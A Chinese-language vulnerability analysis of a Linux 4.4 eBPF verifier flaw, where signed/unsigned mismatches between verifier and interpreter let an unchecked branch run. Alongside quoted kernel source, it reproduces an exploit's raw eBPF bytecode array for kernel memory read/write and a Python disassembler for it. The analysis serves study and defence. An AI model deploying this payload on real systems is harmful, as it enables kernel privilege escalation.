regs[insn->dst_reg] = regs[insn->src_reg];
} else {
// 32-bit move: copying part of a pointer is refused
if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d partial copy of pointer\n",
insn->src_reg);
return -EACCES;
}
regs[insn->dst_reg].type = UNKNOWN_VALUE;
regs[insn->dst_reg].map_ptr = NULL;
}
} else { // source is an immediate: record it and mark the destination CONST_IMM
/* case: R = imm
* remember the value we stored into this reg
*/
// This branch does not test BPF_CLASS, so a BPF_ALU and a BPF_ALU64 MOV
// record the same signed int. The interpreter quoted later in this
// article handles ALU_MOV_K ((u32) IMM) and ALU64_MOV_K (IMM) differently.
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm; // both sides are signed int
}

} else if (opcode > BPF_END) {
verbose("invalid BPF_ALU opcode %x\n", opcode);
return -EINVAL;

} else { /* all other ALU ops: and, sub, xor, add, ... */

... ...
}

return 0;
}

BPF_JMP

如果指令为BPF_JMP类型,do_check函数将跳转指令分为四类情况,第一类是函数调用BPF_CALL指令,第二类是BPF_JA指令,第三类是退出指令BPF_EXIT,第四类是其他跳转指令。第四类跳转指令将进入函数check_cond_jmp_op进行检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1893
} else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);

if (opcode == BPF_CALL) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->off != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_CALL uses reserved fields\n");
return -EINVAL;
}

err = check_call(env, insn->imm);
if (err)
return err;

} else if (opcode == BPF_JA) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_JA uses reserved fields\n");
return -EINVAL;
}

insn_idx += insn->off + 1;
continue;

} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}

/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}

process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
} else {
err = check_cond_jmp_op(env, insn, &insn_idx);
if (err)
return err;
}
}

第四类跳转执行check_cond_jmp_op中的检查逻辑。这个函数主要关注条件跳转中目的寄存器是立即数的情况。当跳转指令类型是BPF_JEQ或BPF_JNE时,会检查目的寄存器的类型是否为立即数(CONST_IMM),如果是,再检查当前指令的imm与目的寄存器的imm是否相等。如果两个imm相等,跳转结果就是确定的:对BPF_JEQ直接跳转到pc+off继续检查,对BPF_JNE则只沿着顺序执行(fall-through)的分支继续检查,另一条分支不会被压栈检查。如果不是确定性跳转,则说明跳转的两个分支都有可能执行,这里将不符合跳转条件的分支记作分支A,符合跳转条件的分支记作分支B,函数会继续检查分支A,直至遇到BPF_EXIT指令,并将分支B(insn_idx + insn->off + 1)压入一个临时栈中。这里注意到两个imm的类型:目的寄存器的状态类型是reg_state,其成员imm的类型是int有符号整数;指令中imm的类型是__s32,也是有符号整数,两个均为有符号整数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1192
/*
 * Verifier check for a conditional jump. Validates the operands, then either
 * follows a single branch when the outcome is known at verification time
 * (JEQ/JNE of a CONST_IMM register against an equal immediate), or pushes the
 * jump target as a pending branch and continues with the fall-through,
 * refining the register state on both sides where possible.
 * Returns 0 on success or a negative errno; *insn_idx is advanced only in
 * the "known JEQ" case.
 */
static int check_cond_jmp_op(struct verifier_env *env,
struct bpf_insn *insn, int *insn_idx)
{
struct reg_state *regs = env->cur_state.regs;
struct verifier_state *other_branch;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode > BPF_EXIT) {
verbose("invalid BPF_JMP opcode %x\n", opcode);
return -EINVAL;
}

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}

/* check src1 operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d pointer comparison prohibited\n",
insn->src_reg);
return -EACCES;
}
} else {
if (insn->src_reg != BPF_REG_0) {
verbose("BPF_JMP uses reserved fields\n");
return -EINVAL;
}
}

/* check src2 operand */
err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
if (err)
return err;

/* detect if R == 0 where R was initialized to zero earlier */
// JEQ/JNE against an immediate where the register is a known constant equal
// to that immediate. Both sides of this comparison are signed 32-bit values
// (reg_state.imm is int, bpf_insn.imm is __s32); the interpreter quoted later
// in this article compares the u64 register against IMM instead.
if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE) &&
regs[insn->dst_reg].type == CONST_IMM &&
regs[insn->dst_reg].imm == insn->imm) {
// outcome is known: only one branch is followed, the other is never pushed
if (opcode == BPF_JEQ) {
/* if (imm == imm) goto pc+off;
* only follow the goto, ignore fall-through
*/
*insn_idx += insn->off;
return 0;
} else {
/* if (imm != imm) goto pc+off;
* only follow fall-through branch, since
* that's where the program will go
*/
return 0;
}
}

// outcome unknown: push the jump target (*insn_idx + insn->off + 1) as a
// pending branch; checking continues with the fall-through
other_branch = push_stack(env, *insn_idx + insn->off + 1, *insn_idx);
if (!other_branch)
return -EFAULT;

/* detect if R == 0 where R is returned value from bpf_map_lookup_elem() */
if (BPF_SRC(insn->code) == BPF_K &&
insn->imm == 0 && (opcode == BPF_JEQ ||
opcode == BPF_JNE) &&
regs[insn->dst_reg].type == PTR_TO_MAP_VALUE_OR_NULL) {
if (opcode == BPF_JEQ) {
/* next fallthrough insn can access memory via
* this register
*/
regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
/* branch targer cannot access it, since reg == 0 */
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = 0;
} else {
// JNE: the jump target is the non-NULL side, the fall-through sees 0
other_branch->regs[insn->dst_reg].type = PTR_TO_MAP_VALUE;
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = 0;
}
} else if (is_pointer_value(env, insn->dst_reg)) {
verbose("R%d pointer comparison prohibited\n", insn->dst_reg);
return -EACCES;
} else if (BPF_SRC(insn->code) == BPF_K &&
(opcode == BPF_JEQ || opcode == BPF_JNE)) {

if (opcode == BPF_JEQ) {
/* detect if (R == imm) goto
* and in the target state recognize that R = imm
*/
other_branch->regs[insn->dst_reg].type = CONST_IMM;
other_branch->regs[insn->dst_reg].imm = insn->imm;
} else {
/* detect if (R != imm) goto
* and in the fall-through state recognize that R = imm
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm;
}
}
if (log_level)
print_verifier_state(env);
return 0;
}

BPF_EXIT

继续模拟执行分支A中的指令,当指令是BPF_EXIT指令时,会执行do_check函数中process_bpf_exit中的逻辑,调用pop_stack检查临时栈中是否还有未检查的分支,如果有则将其弹出,继续模拟执行for循环中的检查逻辑;如果env->head == NULL则说明临时栈已空,没有待检查的分支,所有指令检查完毕,pop_stack返回-1,insn_idx<0跳出for循环,do_check模拟执行结束。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
//do_check
process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}

//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L424
/*
 * Takes the pending branch at env->head off the verifier stack: copies its
 * saved state into env->cur_state, frees the element and returns the
 * instruction index stored in it. If prev_insn_idx is non-NULL it receives
 * the element's prev_insn_idx. Returns -1 when the stack is empty.
 */
static int pop_stack(struct verifier_env *env, int *prev_insn_idx)
{
struct verifier_stack_elem *elem;
int insn_idx;

/* nothing left to verify */
if (env->head == NULL)
return -1;

/* restore the saved state before the element is freed */
memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state));
insn_idx = env->head->insn_idx;
if (prev_insn_idx)
*prev_insn_idx = env->head->prev_insn_idx;
elem = env->head->next;
kfree(env->head);
env->head = elem;
env->stack_size--;
return insn_idx;
}

__bpf_prog_run真正执行

当do_check检查结束后,就完成了eBPF的verifier机制的两轮检查,eBPF代码可以真正执行,真正执行调用 __bpf_prog_run函数,函数维护了一个jumptable跳转表,根据insn->code的类型跳转到不同的逻辑去执行代码。这个函数中有一个寄存器变量regs,它的类型是u64,即64位下的无符号整数类型。函数中涉及到的DST,SRC以及IMM类型如下,可以看到DST和SRC来源于regs,类型为u64,IMM来自类型为bpf_insn的insn,类型为s32。

1
2
3
4
/* Named registers */
/* DST and SRC index the interpreter's regs[] array, declared u64 in __bpf_prog_run */
#define DST regs[insn->dst_reg]
#define SRC regs[insn->src_reg]
/* IMM is the instruction's immediate field, declared __s32 in struct bpf_insn */
#define IMM insn->imm

当出现赋值语句时,以前面的BPF_MOV指令为例,当执行ALU_MOV_K时,会先将IMM由insn->imm(s32)有符号整型转成32位的无符号整型(u32),再零扩展后存入64位的DST;当执行ALU64_MOV_K时,insn->imm(s32)有符号整型会被符号扩展为64位后存入类型为u64的DST。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c#L195
static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
{
u64 stack[MAX_BPF_STACK / sizeof(u64)];
u64 regs[MAX_BPF_REG], tmp;
static const void *jumptable[256] = {
[0 ... 255] = &&default_label,
/* Now overwrite non-defaults ... */
/* 32 bit ALU operations */
... ...
};
u32 tail_call_cnt = 0;
void *ptr;
int off;

#define CONT ({ insn++; goto select_insn; })
#define CONT_JMP ({ insn++; goto select_insn; })

FP = (u64) (unsigned long) &stack[ARRAY_SIZE(stack)];
ARG1 = (u64) (unsigned long) ctx;

/* Registers used in classic BPF programs need to be reset first. */
regs[BPF_REG_A] = 0;
regs[BPF_REG_X] = 0;

select_insn:
goto *jumptable[insn->code];

/* ALU */
#define ALU(OPCODE, OP) \
... ...

ALU(ADD, +)
ALU(SUB, -)
ALU(AND, &)
ALU(OR, |)
ALU(LSH, <<)
ALU(RSH, >>)
ALU(XOR, ^)
ALU(MUL, *)
#undef ALU
... ...
ALU_MOV_X:
DST = (u32) SRC;
CONT;
ALU_MOV_K:
DST = (u32) IMM;
CONT;
ALU64_MOV_X:
DST = SRC;
CONT;
ALU64_MOV_K:
DST = IMM;
CONT;
... ...

既然DST和IMM类型不一致,处理类型为BPF_JMP的指令也存在问题,当指令为JMP_JEQ_K时,会比较DST和IMM的数值是否相等,如果相等,则执行跳转分支insn += insn->off;同样在JMP_JNE_K中,当DST != IMM时,会执行跳转分支insn += insn->off。那这就存在一个问题,在模拟执行do_check的check_cond_jmp_op函数中,当指令为BPF_JNE或BPF_JEQ且目的寄存器的类型是CONST_IMM时,会首先检查insn->imm和目的寄存器的imm是否相等,如果相等则函数认为"不相等"对应的分支不会执行,只沿着"相等"对应的分支继续执行检查逻辑(BPF_JEQ时跳转到pc+off,BPF_JNE时顺序往下),并没有将不相等的分支压入栈中,不相等的这一分支就直接越过了模拟执行的检查,因为函数认为这一分支根本不会执行到,只有在不确定条件跳转时才会先检查分支A,将分支B压入栈中,分支A执行到BPF_EXIT,再弹出分支B继续模拟执行。但是在真正执行时,目标寄存器DST的类型是u64,而IMM的类型是s32,当DST和IMM进行比较时,imm会由s32先符号扩展为s64,然后再由s64转换为u64。例如先用32位的ALU_MOV_K把立即数-1(0xffffffff)赋给寄存器,DST = (u32) IMM得到的是零扩展后的0x00000000ffffffff,而verifier中记录的imm仍是-1;随后DST与IMM(-1)比较时,IMM被符号扩展为0xffffffffffffffff,从而造成DST和IMM不相等,逃避检查的不相等的分支可以得到执行,而且它顺利通过了do_check中的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/core.c#L473
/* JMP */
JMP_JA:
insn += insn->off;
CONT;
JMP_JEQ_X:
if (DST == SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JEQ_K:
if (DST == IMM) { //here
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JNE_X:
if (DST != SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JNE_K:
if (DST != IMM) { //here
insn += insn->off;
CONT_JMP;
}
CONT;
JMP_JGT_X:
if (DST > SRC) {
insn += insn->off;
CONT_JMP;
}
CONT;
... ...

CONT;
JMP_EXIT:
return BPF_R0;
... ...

default_label:
/* If we ever reach this, we have a bug somewhere. */
WARN_RATELIMIT(1, "unknown opcode %02x\n", insn->code);
return 0;
}

利用过程

指令解码

首先看exp中关键的prog数组,将其转化为eBPF指令,每条指令的长度为8个字节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260


prog = ["\xb4\x09\x00\x00\xff\xff\xff\xff",
"\x55\x09\x02\x00\xff\xff\xff\xff",
"\xb7\x00\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x18\x19\x00\x00\x03\x00\x00\x00",
"\x00\x00\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x00\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x06\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x01\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x07\x00\x00\x00\x00\x00\x00",
"\xbf\x91\x00\x00\x00\x00\x00\x00",
"\xbf\xa2\x00\x00\x00\x00\x00\x00",
"\x07\x02\x00\x00\xfc\xff\xff\xff",
"\x62\x0a\xfc\xff\x02\x00\x00\x00",
"\x85\x00\x00\x00\x01\x00\x00\x00",
"\x55\x00\x01\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x79\x08\x00\x00\x00\x00\x00\x00",
"\xbf\x02\x00\x00\x00\x00\x00\x00",
"\xb7\x00\x00\x00\x00\x00\x00\x00",
"\x55\x06\x03\x00\x00\x00\x00\x00",
"\x79\x73\x00\x00\x00\x00\x00\x00",
"\x7b\x32\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x55\x06\x02\x00\x01\x00\x00\x00",
"\x7b\xa2\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00",
"\x7b\x87\x00\x00\x00\x00\x00\x00",
"\x95\x00\x00\x00\x00\x00\x00\x00"]

# Bit fields of the one-byte opcode.  The values below are OR-ed together to
# form the indexes of the `opcode` lookup table.

# Instruction class: BPF_CLASS(code) = (code) & 0x07
BPF_LD = 0x00
BPF_LDX = 0x01
BPF_ST = 0x02
BPF_STX = 0x03
BPF_ALU = 0x04
BPF_JMP = 0x05
BPF_RET = 0x06
BPF_MISC = 0x07

# Access size of load/store instructions: BPF_SIZE(code) = (code) & 0x18
BPF_W = 0x00
BPF_H = 0x08
BPF_B = 0x10

# Addressing mode of load/store instructions: BPF_MODE(code) = (code) & 0xe0
BPF_IMM = 0x00
BPF_ABS = 0x20
BPF_IND = 0x40
BPF_MEM = 0x60
BPF_LEN = 0x80
BPF_MSH = 0xa0


# Operation of ALU/JMP instructions: BPF_OP(code) = (code) & 0xf0
BPF_ADD = 0x00
BPF_SUB = 0x10
BPF_MUL = 0x20
BPF_DIV = 0x30
BPF_OR = 0x40
BPF_AND = 0x50
BPF_LSH = 0x60
BPF_RSH = 0x70
BPF_NEG = 0x80
BPF_MOD = 0x90
BPF_XOR = 0xa0

BPF_JA = 0x00
BPF_JEQ = 0x10
BPF_JGT = 0x20
BPF_JGE = 0x30
BPF_JSET = 0x40

# Operand source of ALU/JMP instructions: BPF_SRC(code) = (code) & 0x08
# (the table below names the two variants *_K and *_X)
BPF_K = 0x00
BPF_X = 0x08

# instruction classes
BPF_ALU64 = 0x07  # alu mode in double word width (same numeric value as BPF_MISC above)

# ld/ldx fields
BPF_DW = 0x18  # double word
BPF_XADD = 0xc0  # exclusive add

# alu/jmp fields
BPF_MOV = 0xb0  # mov reg to reg
BPF_ARSH = 0xc0  # sign extending arithmetic shift right

# change endianness of a register
BPF_END = 0xd0  # flags for endianness conversion:
BPF_TO_LE = 0x00  # convert to little-endian
BPF_TO_BE = 0x08  # convert to big-endian

BPF_JNE = 0x50  # jump !=
BPF_JSGT = 0x60  # SGT is signed '>', GT in x86
BPF_JSGE = 0x70  # SGE is signed '>=', GE in x86
BPF_CALL = 0x80  # function call
BPF_EXIT = 0x90  # function return

# src_reg value that, on an LD_IMM_DW instruction, makes the disassembly loop
# print the instruction as LD_MAP_FD (the immediate is a map fd, not a constant).
BPF_PSEUDO_MAP_FD = 1

# Lookup table mapping an opcode byte (0..255) to its mnemonic.
# Entries left as "" are opcodes this script does not know about.
# Built in one expression instead of an append loop (the loop body had lost
# its indentation and was a syntax error as written).
opcode = [""] * 256

# 32 bit ALU operations
opcode[BPF_ALU | BPF_ADD | BPF_X] = "ALU_ADD_X"
opcode[BPF_ALU | BPF_ADD | BPF_K] = "ALU_ADD_K"
opcode[BPF_ALU | BPF_SUB | BPF_X] = "ALU_SUB_X"
opcode[BPF_ALU | BPF_SUB | BPF_K] = "ALU_SUB_K"
opcode[BPF_ALU | BPF_AND | BPF_X] = "ALU_AND_X"
opcode[BPF_ALU | BPF_AND | BPF_K] = "ALU_AND_K"
opcode[BPF_ALU | BPF_OR | BPF_X] = "ALU_OR_X"
opcode[BPF_ALU | BPF_OR | BPF_K] = "ALU_OR_K"
opcode[BPF_ALU | BPF_LSH | BPF_X] = "ALU_LSH_X"
opcode[BPF_ALU | BPF_LSH | BPF_K] = "ALU_LSH_K"
opcode[BPF_ALU | BPF_RSH | BPF_X] = "ALU_RSH_X"
opcode[BPF_ALU | BPF_RSH | BPF_K] = "ALU_RSH_K"
opcode[BPF_ALU | BPF_XOR | BPF_X] = "ALU_XOR_X"
opcode[BPF_ALU | BPF_XOR | BPF_K] = "ALU_XOR_K"
opcode[BPF_ALU | BPF_MUL | BPF_X] = "ALU_MUL_X"
opcode[BPF_ALU | BPF_MUL | BPF_K] = "ALU_MUL_K"
opcode[BPF_ALU | BPF_MOV | BPF_X] = "ALU_MOV_X"
opcode[BPF_ALU | BPF_MOV | BPF_K] = "ALU_MOV_K"
opcode[BPF_ALU | BPF_DIV | BPF_X] = "ALU_DIV_X"
opcode[BPF_ALU | BPF_DIV | BPF_K] = "ALU_DIV_K"
opcode[BPF_ALU | BPF_MOD | BPF_X] = "ALU_MOD_X"
opcode[BPF_ALU | BPF_MOD | BPF_K] = "ALU_MOD_K"
opcode[BPF_ALU | BPF_NEG] = "ALU_NEG"
opcode[BPF_ALU | BPF_END | BPF_TO_BE] = "ALU_END_TO_BE"
opcode[BPF_ALU | BPF_END | BPF_TO_LE] = "ALU_END_TO_LE"
# 64 bit ALU operations
opcode[BPF_ALU64 | BPF_ADD | BPF_X] = "ALU64_ADD_X"
opcode[BPF_ALU64 | BPF_ADD | BPF_K] = "ALU64_ADD_K"
opcode[BPF_ALU64 | BPF_SUB | BPF_X] = "ALU64_SUB_X"
opcode[BPF_ALU64 | BPF_SUB | BPF_K] = "ALU64_SUB_K"
opcode[BPF_ALU64 | BPF_AND | BPF_X] = "ALU64_AND_X"
opcode[BPF_ALU64 | BPF_AND | BPF_K] = "ALU64_AND_K"
opcode[BPF_ALU64 | BPF_OR | BPF_X] = "ALU64_OR_X"
opcode[BPF_ALU64 | BPF_OR | BPF_K] = "ALU64_OR_K"
opcode[BPF_ALU64 | BPF_LSH | BPF_X] = "ALU64_LSH_X"
opcode[BPF_ALU64 | BPF_LSH | BPF_K] = "ALU64_LSH_K"
opcode[BPF_ALU64 | BPF_RSH | BPF_X] = "ALU64_RSH_X"
opcode[BPF_ALU64 | BPF_RSH | BPF_K] = "ALU64_RSH_K"
opcode[BPF_ALU64 | BPF_XOR | BPF_X] = "ALU64_XOR_X"
opcode[BPF_ALU64 | BPF_XOR | BPF_K] = "ALU64_XOR_K"
opcode[BPF_ALU64 | BPF_MUL | BPF_X] = "ALU64_MUL_X"
opcode[BPF_ALU64 | BPF_MUL | BPF_K] = "ALU64_MUL_K"
opcode[BPF_ALU64 | BPF_MOV | BPF_X] = "ALU64_MOV_X"
opcode[BPF_ALU64 | BPF_MOV | BPF_K] = "ALU64_MOV_K"
opcode[BPF_ALU64 | BPF_ARSH | BPF_X] = "ALU64_ARSH_X"
opcode[BPF_ALU64 | BPF_ARSH | BPF_K] = "ALU64_ARSH_K"
opcode[BPF_ALU64 | BPF_DIV | BPF_X] = "ALU64_DIV_X"
opcode[BPF_ALU64 | BPF_DIV | BPF_K] = "ALU64_DIV_K"
opcode[BPF_ALU64 | BPF_MOD | BPF_X] = "ALU64_MOD_X"
opcode[BPF_ALU64 | BPF_MOD | BPF_K] = "ALU64_MOD_K"
opcode[BPF_ALU64 | BPF_NEG] = "ALU64_NEG"
# Call instruction
opcode[BPF_JMP | BPF_CALL] = "JMP_CALL"
opcode[BPF_JMP | BPF_CALL | BPF_X] = "JMP_TAIL_CALL"
# Jumps
opcode[BPF_JMP | BPF_JA] = "JMP_JA"
opcode[BPF_JMP | BPF_JEQ | BPF_X] = "JMP_JEQ_X"
opcode[BPF_JMP | BPF_JEQ | BPF_K] = "JMP_JEQ_K"
opcode[BPF_JMP | BPF_JNE | BPF_X] = "JMP_JNE_X"
opcode[BPF_JMP | BPF_JNE | BPF_K] = "JMP_JNE_K"
opcode[BPF_JMP | BPF_JGT | BPF_X] = "JMP_JGT_X"
opcode[BPF_JMP | BPF_JGT | BPF_K] = "JMP_JGT_K"
opcode[BPF_JMP | BPF_JGE | BPF_X] = "JMP_JGE_X"
opcode[BPF_JMP | BPF_JGE | BPF_K] = "JMP_JGE_K"
opcode[BPF_JMP | BPF_JSGT | BPF_X] = "JMP_JSGT_X"
opcode[BPF_JMP | BPF_JSGT | BPF_K] = "JMP_JSGT_K"
opcode[BPF_JMP | BPF_JSGE | BPF_X] = "JMP_JSGE_X"
opcode[BPF_JMP | BPF_JSGE | BPF_K] = "JMP_JSGE_K"
opcode[BPF_JMP | BPF_JSET | BPF_X] = "JMP_JSET_X"
opcode[BPF_JMP | BPF_JSET | BPF_K] = "JMP_JSET_K"
# Program return
opcode[BPF_JMP | BPF_EXIT] = "JMP_EXIT"
# Store instructions
opcode[BPF_STX | BPF_MEM | BPF_B] = "STX_MEM_B"
opcode[BPF_STX | BPF_MEM | BPF_H] = "STX_MEM_H"
opcode[BPF_STX | BPF_MEM | BPF_W] = "STX_MEM_W"
opcode[BPF_STX | BPF_MEM | BPF_DW] = "STX_MEM_DW"
opcode[BPF_STX | BPF_XADD | BPF_W] = "STX_XADD_W"
opcode[BPF_STX | BPF_XADD | BPF_DW] = "STX_XADD_DW"
opcode[BPF_ST | BPF_MEM | BPF_B] = "ST_MEM_B"
opcode[BPF_ST | BPF_MEM | BPF_H] = "ST_MEM_H"
opcode[BPF_ST | BPF_MEM | BPF_W] = "ST_MEM_W"
opcode[BPF_ST | BPF_MEM | BPF_DW] = "ST_MEM_DW"
# Load instructions
opcode[BPF_LDX | BPF_MEM | BPF_B] = "LDX_MEM_B"
opcode[BPF_LDX | BPF_MEM | BPF_H] = "LDX_MEM_H"
opcode[BPF_LDX | BPF_MEM | BPF_W] = "LDX_MEM_W"
opcode[BPF_LDX | BPF_MEM | BPF_DW] = "LDX_MEM_DW"
opcode[BPF_LD | BPF_ABS | BPF_W] = "LD_ABS_W"
opcode[BPF_LD | BPF_ABS | BPF_H] = "LD_ABS_H"
opcode[BPF_LD | BPF_ABS | BPF_B] = "LD_ABS_B"
opcode[BPF_LD | BPF_IND | BPF_W] = "LD_IND_W"
opcode[BPF_LD | BPF_IND | BPF_H] = "LD_IND_H"
opcode[BPF_LD | BPF_IND | BPF_B] = "LD_IND_B"
opcode[BPF_LD | BPF_IMM | BPF_DW] = "LD_IMM_DW"




# Instruction layout that the decoding loop below follows (struct bpf_insn):
#   __u8  code;        opcode
#   __u8  dst_reg:4;   dest register
#   __u8  src_reg:4;   source register
#   __s16 off;         signed offset
#   __s32 imm;         signed immediate constant
#
# Printable register names, indexed by the 4-bit register number (0..10).
regs = ["BPF_REG_%d" % number for number in range(11)]

def u32(imm):
    """Decode `imm` as a little-endian unsigned 32-bit integer.

    `imm` is a string holding one character per byte (the format used by the
    entries of `prog`).  Inputs shorter than four characters are zero-padded
    on the right, i.e. the missing high-order bytes count as 0; characters
    beyond the fourth are ignored.
    """
    # ljust() pads only when the input is short and leaves longer input as is.
    imm = imm.ljust(4, '\x00')
    return ord(imm[0]) + (ord(imm[1]) << 8) + (ord(imm[2]) << 16) + (ord(imm[3]) << 24)

def u16(imm):
    """Decode `imm` as a little-endian unsigned 16-bit integer.

    `imm` is a string holding one character per byte (the format used by the
    entries of `prog`).  Inputs shorter than two characters are zero-padded
    on the right, i.e. the missing high-order byte counts as 0; characters
    beyond the second are ignored.
    """
    # ljust() pads only when the input is short and leaves longer input as is.
    imm = imm.ljust(2, '\x00')
    return ord(imm[0]) + (ord(imm[1]) << 8)

# Disassemble `prog`: print one "[index]: MNEMONIC(dst, src, off, imm)" line
# per 8-byte instruction slot.  `off` and `imm` are printed as unsigned hex.
for i in range(len(prog)):
    # Use the raw bytes as they are.  Calling strip() here is wrong: on
    # Python 3, str.strip() treats "\x85" (U+0085) as whitespace, so every
    # BPF_JMP | BPF_CALL instruction (opcode 0x85) lost its opcode byte and
    # was printed with an empty mnemonic and shifted fields.
    ins = prog[i]
    zero_slot = "\x00\x00\x00\x00\x00\x00\x00\x00"

    code = opcode[ord(ins[0])]
    src_index = (ord(ins[1]) >> 4) & 0xf
    src_reg = regs[src_index]
    dst_reg = regs[ord(ins[1]) & 0x0f]
    off = u16(ins[2:4])
    imm = u32(ins[4:])

    # LD_IMM_DW with src_reg == BPF_PSEUDO_MAP_FD, followed by an all-zero
    # slot, is shown as a map-fd load.
    loads_map_fd = (code == "LD_IMM_DW"
                    and src_index == BPF_PSEUDO_MAP_FD
                    and i != len(prog) - 1
                    and prog[i + 1] == zero_slot)

    if loads_map_fd:
        code = "LD_MAP_FD"
        insn = code + '(' + dst_reg + ', ' + 'map_addr' + ')'
    elif ins == zero_slot:
        insn = "bpf_map_padding"
    else:
        # Also reached by an LD_IMM_DW that is NOT followed by a zero slot;
        # previously that case left `insn` unset (or stale from the prior
        # iteration).
        insn = code + '(' + dst_reg + ', ' + src_reg + ', ' + str(hex(off)) + ', ' + str(hex(imm)) + ')'
    print("[%d]: %s" % (i, insn))

